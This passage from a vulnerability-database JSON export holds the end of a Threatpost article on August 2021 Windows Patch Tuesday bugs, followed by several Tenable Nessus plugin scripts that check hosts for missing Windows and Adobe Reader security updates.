\u201cThis bug is listed as publicly known, but it\u2019s not clear if this bug is a variant of PrintNightmare or a unique vulnerability all on its own. There are quite a few print-spooler bugs to keep track of. Either way, attackers can use this to execute code on affected systems. Microsoft does state low privileges are required, so that should put this in the non-wormable category, but you should still prioritize testing and deployment of this critical-rated bug.\u201d\n\nThe critical vulnerability is just one of three Print Spooler issues in the August Patch Tuesday release.\n\n\u201cThe specter of the PrintNightmare continues to haunt this patch Tuesday with three more print spooler vulnerabilities, CVE-2021-36947, CVE-2021-36936 and CVE-2021-34481,\u201d said Breen. \u201cAll three are listed as RCE over the network, requiring a low level of access, similar to PrintNightmare. Microsoft has marked these as \u2018Exploitation More Likely\u2019 which, if the previous speed of POC code being published is anything to go by, is certainly true.\u201d\n\n## **RCE Zero-Day in Windows Update Medic Service **\n\nThe actively exploited bug is tracked as **CVE-2021-36948** and is rated as important; it could pave the way for RCE via the Windows Update Medic Service in Windows 10 and Server 2019 and newer operating systems.\n\n\u201cUpdate Medic is a new service that allows users to repair Windows Update components from a damaged state such that the device can continue to receive updates,\u201d Automox\u2019 Jay Goodman explained. \u201cThe exploit is both low complexity and can be exploited without user interaction, making this an easy vulnerability to include in an adversary\u2019s toolbox.\u201d\n\nImmersive\u2019s Breen added, \u201cCVE-2021-36948 is a privilege-escalation vulnerability \u2013 the cornerstone of modern intrusions as they allow attackers the level of access to do things like hide their tracks and create user accounts. 
In the case of ransomware attacks, they have also been used to ensure maximum damage.\u201d\n\nThough the bug is being reported as being exploited in the wild by Microsoft, activity appears to remain limited or targeted: \u201cWe have seen no evidence of it at Kenna Security at this time,\u201d Jerry Gamblin, director of security research at Kenna Security (now part of Cisco) told Threatpost.\n\n## **Publicly Known Windows LSA Spoofing Bug**\n\nThe second publicly known bug (after the Print Spooler issue covered earlier) is tracked as **CVE-2021-36942**, and it\u2019s an important-rated Windows LSA (Local Security Authority) spoofing vulnerability.\n\n\u201cIt fixes a flaw that could be used to steal NTLM hashes from a domain controller or other vulnerable host,\u201d Immersive\u2019s Breen said. \u201cThese types of attacks are well known for lateral movement and privilege escalation, as has been demonstrated recently by a [new exploit called PetitPotam](<https://threatpost.com/microsoft-petitpotam-poc/168163/>). It is a post-intrusion exploit \u2013 further down the attack chain \u2013 but still a useful tool for attackers.\u201d\n\nChilds offered a bit of context around the bug.\n\n\u201cMicrosoft released this patch to further protect against NTLM relay attacks by issuing this update to block the LSARPC interface,\u201d he said. \u201cThis will impact some systems, notably Windows Server 2008 SP2, that use the EFS API OpenEncryptedFileRawA function. You should apply this to your Domain Controllers first and follow the additional guidance in [ADV210003](<https://msrc.microsoft.com/update-guide/vulnerability/ADV210003>) and [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>). 
This has been an ongoing issue since 2009, and, likely, this isn\u2019t the last we\u2019ll hear of this persistent issue.\u201d\n\nMicrosoft\u2019s next Patch Tuesday will fall on September 14.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-10T21:17:58", "type": "threatpost", "title": "Actively Exploited Windows Zero-Day Gets a Patch", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-1675", "CVE-2021-26424", "CVE-2021-26432", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34527", "CVE-2021-34530", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-36936", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2021-08-10T21:17:58", "id": "THREATPOST:8D4EA8B0593FD44763915E703BC9AB72", "href": "https://threatpost.com/exploited-windows-zero-day-patch/168539/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T15:30:04", "description": "The remote Windows host is missing security update 5003695. It is, therefore, affected by multiple vulnerabilities", "cvss3": {}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003695: Windows Server 2008 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31962", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003695.NASL", "href": "https://www.tenable.com/plugins/nessus/150357", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150357);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31962\",\n \"CVE-2021-31971\",\n \"CVE-2021-31973\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003661\");\n script_xref(name:\"MSKB\", value:\"5003695\");\n script_xref(name:\"MSFT\", value:\"MS21-5003661\");\n script_xref(name:\"MSFT\", value:\"MS21-5003695\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003695: Windows Server 2008 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003695. 
It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003695\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003661\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003695\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003695',\n '5003661'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003695, 5003661])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:30:16", "description": "The remote Windows host is missing security update 5003694. 
It is, therefore, affected by multiple vulnerabilities", "cvss3": {}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003694: Windows 7 and Windows Server 2008 R2 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003694.NASL", "href": "https://www.tenable.com/plugins/nessus/150368", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150368);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31971\",\n \"CVE-2021-31973\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003667\");\n script_xref(name:\"MSKB\", value:\"5003694\");\n script_xref(name:\"MSFT\", value:\"MS21-5003667\");\n script_xref(name:\"MSFT\", value:\"MS21-5003694\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003694: Windows 7 and 
Windows Server 2008 R2 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003694. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003694\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003667\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003694\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003694',\n '5003667'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003694, 5003667])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:30:04", "description": "The remote Windows host is missing security update 5003697. 
It is, therefore, affected by multiple vulnerabilities", "cvss3": {}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003697: Windows Server 2012 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003697.NASL", "href": "https://www.tenable.com/plugins/nessus/150363", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150363);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003697\");\n script_xref(name:\"MSFT\", value:\"MS21-5003697\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n 
script_name(english:\"KB5003697: Windows Server 2012 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003697. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003697\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003697\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is 
Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003697'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003697])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:28:24", "description": "The version of Adobe Reader installed on the remote macOS host is a version prior or equal to 2017.011.30194, 2020.001.30020, or 2021.001.20149.
It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability when parsing a crafted jpeg file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2021-21038, CVE-2021-21044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Adobe Reader <= 2017.011.30194 / 2020.001.30020 / 2021.001.20149 Multiple Vulnerabilities (APSB21-29) (macOS)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", "CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "MACOS_ADOBE_READER_APSB21-29.NASL", "href": "https://www.tenable.com/plugins/nessus/149378", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149378);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2021-21038\",\n \"CVE-2021-21044\",\n \"CVE-2021-21086\",\n \"CVE-2021-28550\",\n \"CVE-2021-28553\",\n \"CVE-2021-28555\",\n \"CVE-2021-28557\",\n \"CVE-2021-28558\",\n \"CVE-2021-28559\",\n \"CVE-2021-28560\",\n \"CVE-2021-28561\",\n \"CVE-2021-28562\",\n \"CVE-2021-28564\",\n \"CVE-2021-28565\"\n );\n 
script_xref(name:\"IAVA\", value:\"2021-A-0229-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Adobe Reader <= 2017.011.30194 / 2020.001.30020 / 2021.001.20149 Multiple Vulnerabilities (APSB21-29) (macOS)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote macOS host is a version prior or equal to 2017.011.30194,\n2020.001.30020, or 2021.001.20149. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and\n 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability when parsing a crafted\n jpeg file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code\n execution in the context of the current user. Exploitation of this issue requires user interaction in that\n a victim must open a malicious file. 
(CVE-2021-21038, CVE-2021-21044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb21-29.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader version 2017.011.30194 / 2020.001.30020 / 2021.001.20149 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_reader_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('Host/local_checks_enabled');\nos = get_kb_item('Host/MacOSX/Version');\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, 'Mac OS X');\n\napp_info = vcf::get_app_info(app:'Adobe Reader');\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '21.001.20149', 'fixed_version' : '21.001.20155' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30020', 'fixed_version' : '20.001.30025' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30194', 'fixed_version' : '17.011.30196' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:28:42", "description": "The version of Adobe Reader installed on the remote Windows host is a version prior or equal to 2017.011.30194, 2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities, including the following:\n\n - Out-of-bounds write vulnerabilities that can result in arbitrary code execution. (CVE-2021-21044, CVE-2021-21038, CVE-2021-21086)\n\n - Use after free vulnerabilities that can result in arbitrary code execution. (CVE-2021-28562, CVE-2021-28550, CVE-2021-28553)\n\n - An out-of-bounds read vulnerability that can result in a memory leak. 
